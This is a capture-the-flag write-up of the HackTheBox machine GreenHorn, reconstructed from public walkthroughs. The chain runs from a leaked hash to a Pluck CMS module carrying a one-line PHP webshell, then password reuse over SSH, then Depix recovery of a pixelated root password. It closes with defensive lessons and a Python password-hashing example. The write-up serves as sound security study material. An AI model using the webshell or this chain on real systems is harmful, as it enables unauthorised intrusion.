Summary
This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.
GreenHorn is an Easy Linux box: Gitea exposes Pluck CMS source
including admin SHA512 hash from data/settings/pass.php →
crack via CrackStation. Pluck admin → install malicious module
zip → webshell as www-data. Pluck admin password reused for
junior SSH. junior’s home has Using OpenVAS.pdf with a
pixelated root password; Depix recovers the redaction →
su to root.
The chain:
- Gitea repo → data/settings/pass.php → SHA512 hash → CrackStation → admin password.
- Pluck admin upload module → webshell as www-data.
- Same password for junior user → SSH.
- PDF in junior’s home has a pixelated root password redaction. Use Depix (Bishop Fox) with a Notepad/Win10 reference image to recover the plaintext. su - → root.
Recon
22/tcp OpenSSH
80/tcp Apache → Pluck CMS 4.7.18
3000/tcp Gitea (Pluck source mirror)
Foothold — pluck source + admin module install
# clone Gitea repos publicly visible
git clone http://greenhorn.htb:3000/junior/Pluck-website
grep -r 'pass' Pluck-website/data/settings/
# pass.php: $pass = 'sha512(...)';
# CrackStation -> <admin password>
Log in to Pluck admin. Modules → install:
evil/
  evil.php    <?php system($_GET['c']); ?>
# -r is needed so the archive contains the files inside evil/, not just the directory entry
zip -r evil.zip evil/
/data/modules/evil/evil.php?c=id → www-data.
User pivot — password reuse
ssh junior@<TARGET>
Password: <admin-pluck-pw>
Root — Depix on PDF
$ ls /home/junior
Using\ OpenVAS.pdf
$ pdfimages 'Using OpenVAS.pdf' out
# extract pixelated image
$ depix -p out-001.png \
-s images/searchimages/debruinseq_notepad_NotepadPlusPlus.png \
-o recovered.png
# OCR recovered.png -> "sidefromsidetheothersidesidefromsidetheotherside"
$ su -
Why each step worked
- Gitea exposing source: developer convenience; settings file with credentials.
- SHA512 + dictionary password: even a “strong” hash algorithm doesn’t help when the input is rockyou-class.
- Pluck module install = code execution: by design.
- Password reuse → OS user: classic.
- Depix vs pixelation: pixelation is a deterministic blockwise average; with a known font, the inverse is searchable. Bishop Fox demonstrated this in 2020.
Counterfactuals
- Don’t put credentials in committed source.
- Use a real KDF (bcrypt, argon2id) + strong password.
- Pluck admin is RCE-equivalent; protect it.
- Don’t pixelate redactions; use solid black boxes.
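The SHA512 point and the KDF counterfactual above, as an added example that is not from the original walkthroughs or from Pluck's code: it shows why an unsalted fast digest can be answered from a precomputed table and what a salted, memory-hard record looks like instead. The wordlist is constructed, the function names are hypothetical, and scrypt from Python's standard library stands in for the bcrypt/argon2id the page recommends; the cost parameters are assumptions.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a rockyou-class dictionary (not from the box).
WORDLIST = ["123456", "password", "iloveyou", "sunshine1", "letmein"]

def sha512_hex(password: str) -> str:
    """Unsalted, single-round SHA-512: the storage scheme the writeup describes."""
    return hashlib.sha512(password.encode()).hexdigest()

# The digest depends only on the password, so it can be precomputed once
# and reused against every site that stores hashes this way.
PRECOMPUTED = {sha512_hex(word): word for word in WORDLIST}

def lookup_unsalted(digest_hex: str):
    """Model of a public lookup service: one table access, no guessing."""
    return PRECOMPUTED.get(digest_hex.lower())

# Assumed scrypt cost parameters (about 16 MiB per hash); tune for your hosts.
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, dklen=32)

def kdf_hash(password: str) -> str:
    """Return 'scrypt$<salt hex>$<key hex>' using a fresh random 16-byte salt."""
    salt = os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return f"scrypt${salt.hex()}${key.hex()}"

def kdf_verify(password: str, record: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    scheme, salt_hex, key_hex = record.split("$")
    if scheme != "scrypt":
        return False
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                         **SCRYPT_PARAMS)
    return hmac.compare_digest(key, bytes.fromhex(key_hex))

if __name__ == "__main__":
    weak = "iloveyou"
    print("unsalted lookup:", lookup_unsalted(sha512_hex(weak)))
    a, b = kdf_hash(weak), kdf_hash(weak)
    print("same password, distinct records:", a != b)
    print("table hit on KDF output:", lookup_unsalted(a.split("$")[2]))
    print("verify:", kdf_verify(weak, a), kdf_verify("password", a))
```

The per-record salt removes the precomputed-table shortcut and the cost factor slows each guess, but a dictionary password still falls to a targeted guess, which is why the counterfactual pairs the KDF with a strong password.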
Source attribution
Reconstruction is grounded in:
- 0xdf, “HTB: GreenHorn” — https://0xdf.gitlab.io/2024/12/07/htb-greenhorn.html
- IppSec, “GreenHorn” video walkthrough — https://ippsec.rocks/?#GreenHorn
- Bishop Fox / Depix project documentation.
I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.